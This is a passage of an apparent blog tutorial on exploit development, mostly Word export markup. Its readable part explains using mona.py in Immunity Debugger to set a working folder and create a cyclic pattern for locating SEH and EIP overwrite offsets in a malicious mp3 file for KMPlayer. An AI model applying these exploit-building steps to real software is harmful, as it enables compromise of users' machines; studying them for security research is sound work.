UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--> <br />
<div class="MsoListParagraph" style="margin-left: .25in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -.25in;"><b style="mso-bidi-font-weight: normal;"><span style="mso-bidi-font-family: Calibri; mso-fareast-font-family: Calibri;"><span style="mso-list: Ignore;">2. <span style="font: 7.0pt "Times New Roman";"></span></span></span></b><b style="mso-bidi-font-weight: normal;">Fun with !mona </b></div><div class="MsoNormal"><br />
</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">As we have identified the SEH overflow, let’s use mona.py to craft an exploit for this. </div><div class="MsoNormal" style="text-align: justify;"><br />
</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Run KMPlayer, attach it to Immunity Debugger. Immunity Debugger will be paused and use this time to run pycommands using mona.py. The output of commands can be seen in “Log” window.</div><div class="MsoNormal" style="text-align: justify;"><br />
</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Specify working folder with <span style="background: #BFBFBF; font-family: "Courier New"; font-size: 8.0pt; mso-shading-themecolor: background1; mso-shading-themeshade: 191;">!mona config –set workingfolder C:\logs\%p</span> and verify the same with <span style="background: #BFBFBF; font-family: "Courier New"; font-size: 8.0pt; mso-shading-themecolor: background1; mso-shading-themeshade: 191;">!mona config –get workingfolder</span><span style="font-family: "Courier New"; font-size: 8.0pt;"></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-YrfpeLGe87M/TgwlBaTpcKI/AAAAAAAAAVs/h93XfC0DG5c/s1600/mona-workinfolder.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-YrfpeLGe87M/TgwlBaTpcKI/AAAAAAAAAVs/h93XfC0DG5c/s400/mona-workinfolder.JPG" width="400" /></a></div><span style="font-family: "Calibri","sans-serif"; font-size: 11pt;"> </span><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--> <br />
<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">With this, all the files created by !mona commands will be stored in this directory.</div><div class="MsoNormal"><br />
</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Now create a pattern of 5000 characters which will be used to replace 5000 “A”s in our mp3 file. This is a cyclic pattern of characters which will help to identify the offsets to overwrite EIP,SEH, or any other registers. This is very helpful while developing an exploit.</div><div class="MsoNormal" style="text-align: justify;"><br />
</div><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: EN-US; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;">Run </span><span style="background: #BFBFBF; font-family: "Courier New"; font-size: 8.0pt; mso-ansi-language: EN-US; mso-bidi-language: EN-US; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-shading-themecolor: background1; mso-shading-themeshade: 191;">!mona pc 5000</span><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: EN-US; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"> command in Immunity Debbuger.</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-vU9JHKTq3BM/Tgwk_4GE_6I/AAAAAAAAAVg/KPg-cAZouH4/s1600/mona-pattern.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-vU9JHKTq3BM/Tgwk_4GE_6I/AAAAAAAAAVg/KPg-cAZouH4/s400/mona-pattern.JPG" width="400" /></a></div><span style="font-family: "Calibri","sans-serif"; font-size: 11pt;"> </span><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
